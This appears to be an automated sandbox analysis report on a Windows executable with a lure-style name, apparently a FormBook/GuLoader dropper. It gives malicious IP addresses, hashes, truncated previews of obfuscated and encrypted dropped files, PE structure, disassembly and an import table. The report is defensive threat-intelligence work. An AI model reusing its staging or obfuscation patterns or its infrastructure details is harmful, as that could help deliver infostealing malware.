                                                        Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
                                                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 209.74.77.109

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\Citlaltpetl

                                                        Download File
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):143378
                                                        Entropy (8bit):2.991133003759073
                                                        Encrypted:false
                                                        SSDEEP:96:AIXLr4A+F05BBCioFtN0Fl1PVA66x/bGcup9IDymun3zrWVjj7qnBaAJZdjurebD:H3bjB1sjGcup9IDymun3zrWVzqnBaA
                                                        MD5:8D3BCE34E93128FA7F65E8175E25FD58
                                                        SHA1:B9C7BFCC05F34AD35F319503BE2C295E06FDADA4
                                                        SHA-256:091D82FCEC8F54192EBB0D779B90A7F0AA3260D1DE911AD1FFDA3005E09DABBD
                                                        SHA-512:6012DF1A0967EB072DEB53D404F9B24707720032A7D727F4D4D3DFAAD489A1AB16637EC277E5EA2D88E00F66023F0337D62F7F04515DC6E9E80595EFE8F15930
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                                        C:\Users\user\AppData\Local\Temp\X0a-0531

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\xwizard.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):135168
                                                        Entropy (8bit):1.1142956103012707
                                                        Encrypted:false
                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\aut8413.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):287232
                                                        Entropy (8bit):7.993678740554399
                                                        Encrypted:true
                                                        SSDEEP:6144:cVwUF/atyLwPFJZhBJwSFEBEvDIVyIdzKSpo:cSUhatGQJbBJ7FAq2o
                                                        MD5:BC10D4F3CB92A85B30D8B876E4B31C2C
                                                        SHA1:477E45AE6337031DFAC5824B0132716D82278126
                                                        SHA-256:06E58610539EF7FE7677D513754AEA0E3830E67D9CC570681100E044FDCB0197
                                                        SHA-512:F85D84A6231C18F783277975BB5E5C6C0A0A24F6085534853E688D9D2F9E42183DBD34350801304D0CD6C1CF6F70A9A1F70EC40751A1A2F75FA52689917D6F3E
                                                        Malicious:false
                                                        Preview:.j.1AK4WHO2S..11.K4WLO2S.011BK4WLO2SN011BK4WLO2SN011BK4WLO2S.011LT.YL.;.o.0}.j`?%<.#<_VC#&.4-!\<:.STb9A9l&\s..b./$P2bB?Yj011BK4W5N;.sPV..+S.q/U.T...x+S.V.rPV.X.p/U..YRY.+S.LO2SN011..4W.N3S..aoBK4WLO2S.030IJ?WL.6SN011BK4W.[2SN 11B+0WLOrSN 11BI4WJO2SN011DK4WLO2SNP51BI4WLO2SL0q.BK$WL_2SN0!1B[4WLO2S^011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2S`DTI6K4W..6SN 11B.0WL_2SN011BK4WLO2Sn01QBK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011

                                                        C:\Users\user\AppData\Local\Temp\aut8472.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):14520
                                                        Entropy (8bit):7.628362779458312
                                                        Encrypted:false
                                                        SSDEEP:384:ITYznwnjovkuyDTqCo1JTglf78Uqf7NanfqjW6k1i6I:IAwnjoVEmCS8lO0nfqaj+
                                                        MD5:FEC65DD272E731DE4D2AE56ED9FED299
                                                        SHA1:5D056F9A109100BB6AEB348B9F88E347E874C8B6
                                                        SHA-256:D87FAFF8F95EA71B0FBBA29AF5196D4EFB50F2BDF338AAF8E47B858CAFA1C864
                                                        SHA-512:66F86486952500CDD4342BC7282E7B8D44DB121682EA381E290576FBA068D49F7590B3F8020357206454A161B8B35B97CDC34389F229DA21BEC84F477704DE63
                                                        Malicious:false
                                                        Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                        C:\Users\user\AppData\Local\Temp\tilths

                                                        Download File
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):287232
                                                        Entropy (8bit):7.993678740554399
                                                        Encrypted:true
                                                        SSDEEP:6144:cVwUF/atyLwPFJZhBJwSFEBEvDIVyIdzKSpo:cSUhatGQJbBJ7FAq2o
                                                        MD5:BC10D4F3CB92A85B30D8B876E4B31C2C
                                                        SHA1:477E45AE6337031DFAC5824B0132716D82278126
                                                        SHA-256:06E58610539EF7FE7677D513754AEA0E3830E67D9CC570681100E044FDCB0197
                                                        SHA-512:F85D84A6231C18F783277975BB5E5C6C0A0A24F6085534853E688D9D2F9E42183DBD34350801304D0CD6C1CF6F70A9A1F70EC40751A1A2F75FA52689917D6F3E
                                                        Malicious:false
                                                        Preview:.j.1AK4WHO2S..11.K4WLO2S.011BK4WLO2SN011BK4WLO2SN011BK4WLO2S.011LT.YL.;.o.0}.j`?%<.#<_VC#&.4-!\<:.STb9A9l&\s..b./$P2bB?Yj011BK4W5N;.sPV..+S.q/U.T...x+S.V.rPV.X.p/U..YRY.+S.LO2SN011..4W.N3S..aoBK4WLO2S.030IJ?WL.6SN011BK4W.[2SN 11B+0WLOrSN 11BI4WJO2SN011DK4WLO2SNP51BI4WLO2SL0q.BK$WL_2SN0!1B[4WLO2S^011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2S`DTI6K4W..6SN 11B.0WL_2SN011BK4WLO2Sn01QBK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.160394758602908
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File size:1'179'648 bytes
                                                        MD5:464587c795efba3d6a77d78ab9f3de32
                                                        SHA1:f2ce67c18f57c7919d951b640c30298bab731141
                                                        SHA256:60f63f5446e6a149513c50ac17e7165bb6c52006eac6acd825a142d55a2ae14f
                                                        SHA512:900a86bc12c444107c1554becf8b5c1a4eb847f47b8a0ca7785e64a5da3e0263d7a84da8e410932c176d3c7faea3e8d3f521e69dbd6b06373e0cc6ad0ae9f958
                                                        SSDEEP:24576:Ju6J33O0c+JY5UZ+XC0kGso6FaucbXiBePm/YMXNnqYgbvqSWY:ru0c++OCvkGs9FaucbXKtXFqxbvWY
                                                        TLSH:3345CF22B3DDC360CB669133FF69B7016EBF7C614630B85B2F980D79A950162162D7A3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                        File Icon

                                                        Icon Hash:aaf3e3e3938382a0

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x427dcd
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x67584B43 [Tue Dec 10 14:08:03 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007F9C646B421Ah
                                                        jmp 00007F9C646A6FE4h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F9C646A716Ah
                                                        cmp edi, eax
                                                        jc 00007F9C646A74CEh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007F9C646A7169h
                                                        rep movsb
                                                        jmp 00007F9C646A747Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007F9C646A7334h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F9C646A7170h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007F9C646A7640h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007F9C646A730Dh
                                                        test edi, 00000003h
                                                        jne 00007F9C646A731Eh
                                                        test esi, 00000003h
                                                        jne 00007F9C646A72FDh
                                                        bt edi, 02h
                                                        jnc 00007F9C646A716Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F9C646A7173h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F9C646A71C5h
                                                        bt esi, 03h
                                                        jnc 00007F9C646A7218h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD4 build 31101
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD4 build 31101

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x57628.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x11f0000x711c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc70000x576280x57800e66ff435eb85879b8b815efd98b64105False0.9240680803571428data7.888148655944783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x11f0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcf7b80x4e8f0data1.0003294217095122
                                                        RT_GROUP_ICON0x11e0a80x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x11e1200x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x11e1340x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x11e1480x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x11e15c0xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x11e2380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                        Imports

                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
